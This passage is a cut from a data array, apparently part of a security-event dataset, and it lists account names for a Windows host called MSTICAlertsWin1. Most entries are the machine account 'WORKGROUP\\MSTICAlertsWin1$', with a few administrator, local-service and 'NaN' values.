ORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NT AUTHORITY\\\\LOCAL SERVICE\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NT AUTHORITY\\\\LOCAL SERVICE\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"W